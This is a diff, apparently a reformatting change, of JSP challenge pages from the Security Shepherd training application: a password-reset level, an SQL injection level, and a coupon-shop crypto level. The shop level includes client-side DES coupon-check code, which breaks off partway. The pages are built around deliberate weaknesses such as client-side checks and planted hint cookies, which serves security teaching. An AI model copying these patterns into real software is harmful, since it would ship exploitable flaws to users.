-        $("#answerQuestion").hide("fast");
-        $("#answerLoadingSign").show("slow");
-        $("#resultsDiv3").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>SecretQuestion",
-                data: {
-                    subEmail: theResetEmail,
-                    subAnswer: theAnswer
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv3").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv3").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv3").show("slow", function () {
-                $("#answerLoadingSign").hide("fast", function () {
-                    $("#answerQuestion").show("slow");
-                });
-            });
-        });
-    });
-
-
-    $("#forgottenPasswordLink").click(function () {
-        $("#forgottenPassDiv").toggle("slow", function () {
-            //Animation Complete
-            ;
-        });
-    });
-
-    // <%= bundle.getString("clue.1") %>
-    document.cookie = "ac=ZG9Ob3RSZXR1cm5BbnN3ZXJz";
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		</p>
+	</div>
+	<script>
+			
+			$("#leForm").submit(function(){
+				var theSubName = $("#subName").val();
+				var theSubPassword = $("#subPassword").val();
+				$("#loadingSign").show("slow");
+				$("#forgottenPassDiv").hide("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							subName: theSubName,
+							subPassword: theSubPassword
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#loadingSign").hide("fast", function(){
+						$("#resultsDiv").show("slow");
+					});
+				});
+			});
+			
+			$("#leForm2").submit(function(){
+				var theResetEmail = $("#resetEmail").val();
+				$("#resetSubmit").hide("fast");
+				$("#resetLoadingSign").show("slow");
+				$("#resultsDiv2").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "GET",
+						url: "<%= levelHash %>SecretQuestion",
+						data: {
+							subEmail: theResetEmail
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv2").html("<p>" + ajaxCall.responseText + "</p>");
+					}
+					else
+					{
+						$("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv2").show("slow", function(){
+						$("#resetLoadingSign").hide("fast", function(){
+							$("#resetSubmit").show("slow");
+							$("#answerQuestionDiv").show("slow");
+						});
+					});
+				});
+			});
+			
+			$("#leForm3").submit(function(){
+				var theResetEmail = $("#resetEmail").val();
+				var theAnswer = $("#questionAnswer").val();
+				$("#answerQuestion").hide("fast");
+				$("#answerLoadingSign").show("slow");
+				$("#resultsDiv3").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>SecretQuestion",
+						data: {
+							subEmail: theResetEmail,
+							subAnswer: theAnswer
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv3").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv3").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv3").show("slow", function(){
+						$("#answerLoadingSign").hide("fast", function(){
+							$("#answerQuestion").show("slow");
+						});
+					});
+				});
+			});
+			
+			
+			$("#forgottenPasswordLink").click(function(){
+				$("#forgottenPassDiv").toggle("slow", function(){
+					//Animation Complete
+					;
+				});
+			});
+			
+			// <%= bundle.getString("clue.1") %>
+			document.cookie="ac=ZG9Ob3RSZXR1cm5BbnN3ZXJz";
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.jsp b/src/main/webapp/challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.jsp
index 54f1814f7..1e08db7a7 100644
--- a/src/main/webapp/challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.jsp
+++ b/src/main/webapp/challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.jsp
@@ -1,149 +1,159 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    // SQL Injection Challenge Three
+// SQL Injection Challenge Three
 
 /**
  * <br/><br/>
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
  *
  * @author Mark Denihan
  */
 
-    String levelName = "SQL Injection Challenge Three";
-    String levelHash = "b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6";
+String levelName = "SQL Injection Challenge Three";
+String levelHash = "b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+String i18nLevelName = bundle.getString("challenge.challengeName");
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
 
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title">
-        <%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.pleaseEnter") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="theUserName" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.button.value") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title">
+			<%= i18nLevelName %>
+		</h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.pleaseEnter") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="theUserName" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.button.value") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#userContent").text($("#theUserName").val());
-        var theName = $("#theUserName").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6",
-                data: {
-                    theUserName: theName
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-    $("#theUserName").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#userContent").text($("#theUserName").val());
+				var theName = $("#theUserName").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6",
+						data: {
+							theUserName: theName
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+			$("#theUserName").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9.jsp b/src/main/webapp/challenges/b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9.jsp
index 981755d38..92507c3e5 100644
--- a/src/main/webapp/challenges/b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9.jsp
+++ b/src/main/webapp/challenges/b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9.jsp
@@ -1,446 +1,449 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 //No Quotes In level Name
-    String levelName = "Insecure Crypto Storage Challenge 4";
+String levelName = "Insecure Crypto Storage Challenge 4";
 //Alphanumeric Only
-    String levelHash = "b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9";
+String levelHash = "b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9";
 
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.insecureCryptoStorage.insecureCryptoStorage", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.insecureCryptoStorage.insecureCryptoStorage", locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("insecureCryptoStorage.4.challengename");
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+String i18nLevelName = bundle.getString("insecureCryptoStorage.4.challengename");
+
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("insecureCryptoStorage.4.whatToDo") %>
-        <br/> <br/>
-    <h3 class="title"><%= bundle.getString("insecureCryptoStorage.4.shop") %>
-    </h3>
-    <p><%= bundle.getString("insecureCryptoStorage.4.shop.message.1") %>
-        <a>PleaseTakeAFruit</a>
-        <%= bundle.getString("insecureCryptoStorage.4.shop.message.2") %>
-        <a>FruitForFree</a>
-        <%= bundle.getString("insecureCryptoStorage.4.shop.message.3") %>
-    </p>
-    <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <!-- Header -->
-            <tr>
-                <th><%= bundle.getString("insecureCryptoStorage.4.shop.picture") %>
-                </th>
-                <th><%= bundle.getString("insecureCryptoStorage.4.shop.cost") %>
-                </th>
-                <th><%= bundle.getString("insecureCryptoStorage.4.shop.quantity") %>
-                </th>
-            </tr>
-            <!-- Apple Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%= levelHash %>/apple.jpg"/></td>
-                <td>$45</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfApples" autocomplete="off"/>
-            </tr>
-            <!-- Banana Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%= levelHash %>/banana.jpg"/></td>
-                <td>$15</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfBananas" autocomplete="off"/>
-            </tr>
-            <!-- Oranges Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%= levelHash %>/orange.jpg"/></td>
-                <td>$3000</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfOranges" autocomplete="off"/>
-            </tr>
-            <!-- Pineapples Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%= levelHash %>/pineapple.png"/></td>
-                <td>$30</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfPineapples" autocomplete="off"/>
-            </tr>
-        </table>
-        <p><%= bundle.getString("insecureCryptoStorage.4.shop.howToShop") %>
-        </p>
-        <table>
-            <tr>
-                <td><%= bundle.getString("insecureCryptoStorage.4.shop.couponCode") %>
-                </td>
-                <td><input type="text" id="couponCode" autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td colspons=2>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("insecureCryptoStorage.4.shop.submit") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("insecureCryptoStorage.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        var thePineappleAmount = $("#numberOfPineapples").val();
-        var theOrangeAmount = $("#numberOfOranges").val();
-        var theAppleAmount = $("#numberOfApples").val();
-        var theBananaAmount = $("#numberOfBananas").val();
-        var theCouponCode = $("#couponCode").val();
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    pineappleAmount: thePineappleAmount,
-                    orangeAmount: theOrangeAmount,
-                    appleAmount: theAppleAmount,
-                    bananaAmount: theBananaAmount,
-                    couponCode: theCouponCode
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("insecureCryptoStorage.errorOccurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<script src="<%= levelHash %>/couponCheck.js"></script>
-<script>
-    $('#couponCode').change(function () {
-        if (!checkCoupon($('#couponCode').val())) {
-            $('#couponCode').css("background-color", "#E06666");
-        } else {
-            $('#couponCode').css("background-color", "#66E066");
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
-<%
-    /*
-    Clean Code Version of obfusticated couponCheck.js
-
-    //DES in JS by Paul Tero, July 2001
-    //http://www.tero.co.uk/des/
-    //
-    //Optimised for performance with large blocks by Michael Hayworth, November 2001
-    //http://www.netdealing.com
-    //
-    //THIS SOFTWARE IS PROVIDED "AS IS" AND
-    //ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-    //IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
-    //ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
-    //FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-    //DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
-    //OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
-    //HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-    //LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
-    //OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
-    //SUCH DAMAGE.
-
-    //des
-    //this takes the key, the message, and whether to encrypt or decrypt
-    function des (key, message, encrypt, mode, iv, padding) {
-      //declaring this locally speeds things up a bit
-      var spfunction1 = new Array (0x1010400,0,0x10000,0x1010404,0x1010004,0x10404,0x4,0x10000,0x400,0x1010400,0x1010404,0x400,0x1000404,0x1010004,0x1000000,0x4,0x404,0x1000400,0x1000400,0x10400,0x10400,0x1010000,0x1010000,0x1000404,0x10004,0x1000004,0x1000004,0x10004,0,0x404,0x10404,0x1000000,0x10000,0x1010404,0x4,0x1010000,0x1010400,0x1000000,0x1000000,0x400,0x1010004,0x10000,0x10400,0x1000004,0x400,0x4,0x1000404,0x10404,0x1010404,0x10004,0x1010000,0x1000404,0x1000004,0x404,0x10404,0x1010400,0x404,0x1000400,0x1000400,0,0x10004,0x10400,0,0x1010004);
-      var spfunction2 = new Array (-0x7fef7fe0,-0x7fff8000,0x8000,0x108020,0x100000,0x20,-0x7fefffe0,-0x7fff7fe0,-0x7fffffe0,-0x7fef7fe0,-0x7fef8000,-0x80000000,-0x7fff8000,0x100000,0x20,-0x7fefffe0,0x108000,0x100020,-0x7fff7fe0,0,-0x80000000,0x8000,0x108020,-0x7ff00000,0x100020,-0x7fffffe0,0,0x108000,0x8020,-0x7fef8000,-0x7ff00000,0x8020,0,0x108020,-0x7fefffe0,0x100000,-0x7fff7fe0,-0x7ff00000,-0x7fef8000,0x8000,-0x7ff00000,-0x7fff8000,0x20,-0x7fef7fe0,0x108020,0x20,0x8000,-0x80000000,0x8020,-0x7fef8000,0x100000,-0x7fffffe0,0x100020,-0x7fff7fe0,-0x7fffffe0,0x100020,0x108000,0,-0x7fff8000,0x8020,-0x80000000,-0x7fefffe0,-0x7fef7fe0,0x108000);
-      var spfunction3 = new Array (0x208,0x8020200,0,0x8020008,0x8000200,0,0x20208,0x8000200,0x20008,0x8000008,0x8000008,0x20000,0x8020208,0x20008,0x8020000,0x208,0x8000000,0x8,0x8020200,0x200,0x20200,0x8020000,0x8020008,0x20208,0x8000208,0x20200,0x20000,0x8000208,0x8,0x8020208,0x200,0x8000000,0x8020200,0x8000000,0x20008,0x208,0x20000,0x8020200,0x8000200,0,0x200,0x20008,0x8020208,0x8000200,0x8000008,0x200,0,0x8020008,0x8000208,0x20000,0x8000000,0x8020208,0x8,0x20208,0x20200,0x8000008,0x8020000,0x8000208,0x208,0x8020000,0x20208,0x8,0x8020008,0x20200);
-      var spfunction4 = new Array (0x802001,0x2081,0x2081,0x80,0x802080,0x800081,0x800001,0x2001,0,0x802000,0x802000,0x802081,0x81,0,0x800080,0x800001,0x1,0x2000,0x800000,0x802001,0x80,0x800000,0x2001,0x2080,0x800081,0x1,0x2080,0x800080,0x2000,0x802080,0x802081,0x81,0x800080,0x800001,0x802000,0x802081,0x81,0,0,0x802000,0x2080,0x800080,0x800081,0x1,0x802001,0x2081,0x2081,0x80,0x802081,0x81,0x1,0x2000,0x800001,0x2001,0x802080,0x800081,0x2001,0x2080,0x800000,0x802001,0x80,0x800000,0x2000,0x802080);
-      var spfunction5 = new Array (0x100,0x2080100,0x2080000,0x42000100,0x80000,0x100,0x40000000,0x2080000,0x40080100,0x80000,0x2000100,0x40080100,0x42000100,0x42080000,0x80100,0x40000000,0x2000000,0x40080000,0x40080000,0,0x40000100,0x42080100,0x42080100,0x2000100,0x42080000,0x40000100,0,0x42000000,0x2080100,0x2000000,0x42000000,0x80100,0x80000,0x42000100,0x100,0x2000000,0x40000000,0x2080000,0x42000100,0x40080100,0x2000100,0x40000000,0x42080000,0x2080100,0x40080100,0x100,0x2000000,0x42080000,0x42080100,0x80100,0x42000000,0x42080100,0x2080000,0,0x40080000,0x42000000,0x80100,0x2000100,0x40000100,0x80000,0,0x40080000,0x2080100,0x40000100);
-      var spfunction6 = new Array (0x20000010,0x20400000,0x4000,0x20404010,0x20400000,0x10,0x20404010,0x400000,0x20004000,0x404010,0x400000,0x20000010,0x400010,0x20004000,0x20000000,0x4010,0,0x400010,0x20004010,0x4000,0x404000,0x20004010,0x10,0x20400010,0x20400010,0,0x404010,0x20404000,0x4010,0x404000,0x20404000,0x20000000,0x20004000,0x10,0x20400010,0x404000,0x20404010,0x400000,0x4010,0x20000010,0x400000,0x20004000,0x20000000,0x4010,0x20000010,0x20404010,0x404000,0x20400000,0x404010,0x20404000,0,0x20400010,0x10,0x4000,0x20400000,0x404010,0x4000,0x400010,0x20004010,0,0x20404000,0x20000000,0x400010,0x20004010);
